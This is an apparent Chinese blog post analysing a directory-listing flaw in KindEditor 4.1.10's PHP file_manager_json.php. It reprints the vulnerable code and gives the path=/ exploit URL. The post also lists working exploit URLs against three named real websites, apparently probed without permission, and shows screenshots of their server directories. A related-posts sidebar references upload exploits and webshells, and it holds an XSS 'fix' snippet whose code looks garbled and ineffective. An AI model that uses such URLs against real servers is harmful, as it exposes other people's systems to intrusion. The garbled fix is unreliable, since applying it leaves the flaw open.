kindeditor php 漏洞,Kindeditor特定情况可能会导致全盘浏览 - 网站安全

最新推荐文章于 2024-02-20 14:38:50 发布
最新推荐文章于 2024-02-20 14:38:50 发布
阅读量907 收藏
点赞数
文章标签: kindeditor php 漏洞

因为例子很少,开始想了下不是他们的漏洞,后面想了下,后面没有检查好用户的正常配置内容导致,还是提下吧。

下载地址:

http://kindeditor.googlecode.com/files/kindeditor-4.1.10.zip

貌似是最新版本的。

测试语言:PHP

测试漏洞文件:/kindeditor/php/file_manager_json.php

默认配置(第16行):

$root_path = $php_path . '../attached/';

当/attached/文件夹不存在(被删)或者被改名为一个不存在的目录时,如网上的一个例子:

$root_path = $php_path . '../../../upload/';

这个CMS下面的目录根本就没得这个目录,所以就造成了漏洞。

怎么造成了漏洞的呢?我们分析下。

/**

* KindEditor PHP

*

* 本PHP程序是演示程序,建议不要直接在实际项目中使用。

* 如果您确定直接使用本程序,使用之前请仔细确认相关安全设置。

*

*/

require_once 'JSON.php';

$php_path = dirname(__FILE__) . '/';

$php_url = dirname($_SERVER['PHP_SELF']) . '/';

//根目录路径,可以指定绝对路径,比如 /var/www/attached/

$root_path = $php_path . '../../../upload/';

//根目录URL,可以指定绝对路径,比如 http://www.yoursite.com/attached/

$root_url = $php_url . '../../../upload/';

//图片扩展名

$ext_arr = array('gif', 'jpg', 'jpeg', 'png', 'bmp');

//目录名

$dir_name = empty($_GET['dir']) ? '' : trim($_GET['dir']);

if (!in_array($dir_name, array('', 'image', 'flash', 'media', 'file'))) {

echo "Invalid Directory name.";

exit;

}

if ($dir_name !== '') {

$root_path .= $dir_name . "/";

$root_url .= $dir_name . "/";

if (!file_exists($root_path)) {

mkdir($root_path);

}

}

//根据path参数,设置各路径和URL

if (empty($_GET['path'])) {

$current_path = realpath($root_path) . '/';

$current_url = $root_url;

$current_dir_path = '';

$moveup_dir_path = '';

} else {

$current_path = realpath($root_path) . '/' . $_GET['path'];

$current_url = $root_url . $_GET['path'];

$current_dir_path = $_GET['path'];

$moveup_dir_path = preg_replace('/(.*?)[^\/]+\/$/', '$1', $current_dir_path);

}

//echo realpath($root_path);

//排序形式,name or size or type

$order = empty($_GET['order']) ? 'name' : strtolower($_GET['order']);

//不允许使用..移动到上一级目录

if (preg_match('/\.\./', $current_path)) {

echo 'Access is not allowed.';

exit;

}

//最后一个字符不是/

if (!preg_match('/\/$/', $current_path)) {

echo 'Parameter is not valid.';

exit;

}

//目录不存在或不是目录

if (!file_exists($current_path) || !is_dir($current_path)) {

echo 'Directory does not exist.';

exit;

}

//遍历目录取得文件信息

$file_list = array();

if ($handle = opendir($current_path)) {

$i = 0;

while (false !== ($filename = readdir($handle))) {

if ($filename{0} == '.') continue;

$file = $current_path . $filename;

if (is_dir($file)) {

$file_list[$i]['is_dir'] = true; //是否文件夹

$file_list[$i]['has_file'] = (count(scandir($file)) > 2); //文件夹是否包含文件

$file_list[$i]['filesize'] = 0; //文件大小

$file_list[$i]['is_photo'] = false; //是否图片

$file_list[$i]['filetype'] = ''; //文件类别,用扩展名判断

} else {

$file_list[$i]['is_dir'] = false;

$file_list[$i]['has_file'] = false;

$file_list[$i]['filesize'] = filesize($file);

$file_list[$i]['dir_path'] = '';

$file_ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));

$file_list[$i]['is_photo'] = in_array($file_ext, $ext_arr);

$file_list[$i]['filetype'] = $file_ext;

}

$file_list[$i]['filename'] = $filename; //文件名,包含扩展名

$file_list[$i]['datetime'] = date('Y-m-d H:i:s', filemtime($file)); //文件最后修改时间

$i++;

}

closedir($handle);

}

//排序

function cmp_func($a, $b) {

global $order;

if ($a['is_dir'] && !$b['is_dir']) {

return -1;

} else if (!$a['is_dir'] && $b['is_dir']) {

return 1;

} else {

if ($order == 'size') {

if ($a['filesize'] > $b['filesize']) {

return 1;

} else if ($a['filesize'] < $b['filesize']) {

return -1;

} else {

return 0;

}

} else if ($order == 'type') {

return strcmp($a['filetype'], $b['filetype']);

} else {

return strcmp($a['filename'], $b['filename']);

}

}

}

usort($file_list, 'cmp_func');

$result = array();

//相对于根目录的上一级目录

$result['moveup_dir_path'] = $moveup_dir_path;

//相对于根目录的当前目录

$result['current_dir_path'] = $current_dir_path;

//当前目录的URL

$result['current_url'] = $current_url;

//文件数

$result['total_count'] = count($file_list);

//文件列表数组

$result['file_list'] = $file_list;

//输出JSON字符串

header('Content-type: application/json; charset=UTF-8');

$json = new Services_JSON();

echo $json->encode($result);

第三十八行:

$current_path = realpath($root_path) . '/';

当$root_path被realpath以后,不存在的目录会返回空,然后连接后面的'/'

$current_path所以默认就等于'/'

当提交了$_GET['path']以后,而且$_GET['path']要以'/'为结尾(有验证),所以,我们就可以构造浏览全盘目录了。

kingedit/php/file_manager_json.php?path=/ (浏览盘符的根目录)

接着上面给出验证的(互联网找到几个):

先给本地的(attached文件夹被我删了):

e8f2192c7dd203adedd2b46bf8a35b1f.gif

861fd8f03806e74aeba007c701a02f87.gif

互联网找到的:

http://demo.douco.com/admin/include/kindeditor/php/file_manager_json.php?path=home/demodoucokdce4mmohd8okuoc1o/wwwroot/&dir=image

12c45593099631d8d33112da4da751e9.gif

http://route53.com.tw/static/jscripts/kindeditor/php/file_manager_json.php?path=home/onepage/public_html/

b4fe9d0a2fd0100c8858b098deea0f9f.gif

http://www.bndvalve.com/Public/kindeditor/php/file_manager_json.php?path=wwwroot/bonade/

64afb0024f336fb38520bfe17ddda10a.gif

修复方案:

再验证下绝对路径?

苏sa
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
(CVE-2017-1002024)Kindeditor <=4.1.11 上传漏洞
XZ_______的博客
04-22 328
漏洞存在于kindeditor编辑器里,你能上传.txt和.html文件,支持php/asp/jsp/asp.net,漏洞存在于小于等于kindeditor4.1.11编辑器中。
kindeditor上传漏洞复现(CVE-2017-1002024)
qq_34853514的博客
08-09 3782
漏洞简介 漏洞编号: CVE-2017-1002024 漏洞详情: KindEditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,在于小于等于kindeditor4.1.12 编辑器里,可以上传.txt和.html文件,支持php/asp/jsp/asp.net。 漏洞影响范围: kindeditor<=4.1.11 漏洞原理: upload_json.*中代码并没有对用户上传的文件格式,以及大小进行安全检测,导致用户可以伪造恶意文件进行上传,尤其html文件可以
kindeditor4.1.10的应用
baicp3的专栏
05-09 1014
本人用的java项目
记录又一次实战GetShell
蚁景网安学院
04-18 4370
严正声明截至发稿前,已将漏洞提交厂商并验证其已完成修复。本文仅限于技术讨论与分享,严禁用于非法途径。若读者因此作出任何危害网络安全行为后果自负,与本号及原作者无关。前言本文为记录实战过程中遇到的问题及思考,旨在思路分享及自我总结。文中涉及目标站点为SRC授权站点,为防止漏打码已对实际链接进行了部分删减,如去除了链接目录名等。整个测试过程涉及未授权访问、暴力破解、存储型XS...
KKCMS——新手级代码审计
D.MIND 的博客
07-30 921
前言: 做个简单的审计练练手,真的好久没审计了…KKCMS真的很适合新手入门审计,所以我就来审了,233 文章目录前言:kindeditor编辑器 <= 4.1.5文件上传漏洞利用一:构造恶意代码利用二:信息泄露前台SQL注入——stripslashes函数的不当使用前台SQL注入——未过滤后台SQL注入——未过滤后台反射型XSS——未过滤前台反射型XSS后台存储型XSS前台存储型XSS后记 kindeditor编辑器 <= 4.1.5文件上传漏洞 目录中能注意到kindeditor.js,在k
KindEditor 4.1.10 (2013-11-23)
12-03
KindEditor ASP.NET 本ASP.NET程序是演示程序,建议不要直接在实际项目中使用。 如果您确定直接使用本程序,使用之前请仔细确认相关安全设置。 使用方法: 1. 解压zip文件,将所有文件复制到IIS的wwwroot/kindeditor目录下。 2. 将kindeditor/asp.net/bin目录下的dll文件复制到wwwroot/bin目录下。 3. 打开浏览器,输入http://localhost:[P0RT]/kindeditor/asp.net/demo.aspx。
kindeditor老版本version 4.1.10 bug踩坑
weixin_30750335的博客
11-16 1893
目录 上传图片或者视频的弹窗有时候不出现,只出现遮罩 视频上传无法播放的问题 参考链接: 问题目录 上传图片或者视频的弹窗有时候不出现,只出现遮罩 通过测试发现,出现这种情况不是弹出框没有出现,而是设置固定定位top值为空,元素出现在了屏幕之外(屏幕下边); 查看E...
kindeditor编辑器文件上传漏洞
shy的博客
03-12 3922
kindeditor编辑器版本小于4.1.5存在文件上传漏洞,可利用该漏洞上次网页、文本文件,可网站进行篡改,添加赌博、反共等违法信息。 通过扫描器发现该网站存在编辑器。 通过浏览器访问,确定该编辑器为kindeditor编辑器。 确定该编辑器的版本小于4.1.5,存在文件上传漏洞。 构造文件上传漏洞利用脚本kindeditor.html。 <html><head> <title>Uploader</title> <s
KindEditor 文件上传漏洞漏洞
热门推荐
mei_13的博客
07-31 1万+
1 漏洞简介 1.1 漏洞描述 KindEditor是一套开源的HTML可视化编辑器,使用JavaScript编写,支持asp、aspx、php、jsp,几乎支持了所有的网站,该编辑器主要用于让用户在网站上获得所见即所得编辑效果,兼容IE、Firefox、Chrome、Safari、Opera等主流浏览器,非常适合在CMS、商城、论坛、博客、Wiki、电子邮件等互联网应用上使用。且该编辑器支持上传功能,如果上传文件类型控制的不好,那么我们就能利用该漏洞,上传doc,docx,xls,xlsx,ppt,h
kindeditor-4.1.11多图上传按钮无法出现且无法点击flash无法上传
05-06
在提供的压缩包文件中,可能包含了修复这个问题所需的部分资源,如`kindeditor.js`是编辑器的核心文件,`lang`目录下有各种语言的配置文件,`plugins`包含了各种插件,`up_newfile_lj`可能是上传相关的脚本或配置,...
kindeditor--4.1.12 解决flash批量上传图片按钮不显示与支持video视频
06-14
KindEditor 是一个开源的Web富文本编辑器,广泛应用于网页内容编辑。版本4.1.12是一个较早的更新,但仍然有用户在使用。本篇文章将详细讲解如何解决在该版本中遇到的两个主要问题:Flash批量上传图片按钮不显示以及...
KindEditor 4.1.11网站实例
03-07
KindEditor是非常好的富媒体文本编辑系统,短小精悍,可惜网上找到的都是有各种问题!一怒之下,我自己进行了修改和配置,搞成了一个网站示例.下载解压后,可以直接运行!!完全无问题.! Kindeditor版本好像官方2012年之后就不更新了,官方最新的为 KindEditor 4.1.1 (2012-06-10), ,我这个网站里的是从qq群里下载的 标明的版本为4.1.11
网站后台编辑器拿webshell
06-08
渗透交流 欢迎大家加入 共同交流 资源共享
kindeditor4.1.10简单示例
08-25
kindeditor4.1.10 这是一个很好用的富文本框插件,使用方便、简单。里面有小示例,如果有需要详细介绍的请到官网查看。
KindEditor ASP 版网站后台编辑器源码
01-17
【工控老马出品,必属精品,质量保证,亲测能用】 ...这是KindEditor的ASP版网站后台编辑器,通过测试使用的。 兼容现有的各种浏览器,UTF-8编码和GB2312编码均可使用的。 适合人群:新手及有一定经验的开发人员
富文本 文章在线编辑器kindeditor4x---加上layui版
06-12
总的来说,这种组合为开发者提供了一种高效且美观的在线文章编辑解决方案,适合于新闻网站、博客系统、CMS(内容管理系统)等多种应用场景。通过深入理解和实践这两个工具,开发者可以创建出功能强大且用户体验优良...
漏洞挖掘 | 编辑器漏洞kindeditor
最新发布
hackzkaq的博客
02-20 1745
可能手法比较老,毕竟也不能否定他的存在。渗透测试的核心讲究测试嘛。希望这篇文章对一直探索的我们有所帮助。申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.免费领取安全学习资料包!渗透工具技术文档、书籍面试题帮助你在面试中脱颖而出视频基础到进阶环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等应急响应笔记学习路线。
Ueditor、FCKeditor、Kindeditor编辑器漏洞
网安君的博客
01-27 6260
UEditor是由百度web前端研发部开发的所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点。Ueditor、FCKeditor、Kindeditor编辑器漏洞
KindEditor 文件上传漏洞验证
LiBai'S BLOG
09-30 2379
KindEditor 文件上传漏洞漏洞描述影响范围漏洞验证1.查看版本信息2.漏洞验证漏洞修复 漏洞描述 漏洞存在于KindEditor编辑器里,你能上传.txt和.html文件,支持php/asp/jsp/asp.net,漏洞存在于小于等于kindeditor4.1.5编辑器中。 这里html里面可以嵌套暗链接地址以及嵌套xss。Kindeditor上的uploadbutton.html用于文件上传功能页面,直接POST到/upload_json.*?dir=file,在允许上传的文件扩展名中包含htm
kindeditor 4.1.11xss 漏洞修复
06-13
KindEditor 4.1.11 版本的 XSS 漏洞修复可以参考以下步骤: 1. 下载最新版本的 KindEditor,并将其替换原来的文件。 2. 在 `kindeditor.js` 文件中搜索 `function editorHtmlEncode`,找到该函数。 3. 修改该函数,将以下代码: ``` s = s.replace(/&/g, '&'); s = s.replace(/</g, '<'); s = s.replace(/>/g, '>'); s = s.replace(/"/g, '"'); s = s.replace(/'/g, '''); ``` 替换为: ``` s = s.replace(/&(?!\w+;)/g, '&'); s = s.replace(/</g, '<'); s = s.replace(/>/g, '>'); s = s.replace(/"/g, '"'); s = s.replace(/'/g, '''); ``` 这里主要是增加了正则表达式,对 `&` 符号进行了特殊处理。 4. 重启服务器,确保新代码生效。 通过以上步骤,可以有效修复 KindEditor 4.1.11 版本的 XSS 漏洞。同时,建议定期更新 KindEditor 并加强用户输入内容的过滤和验证,以保证编辑器的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值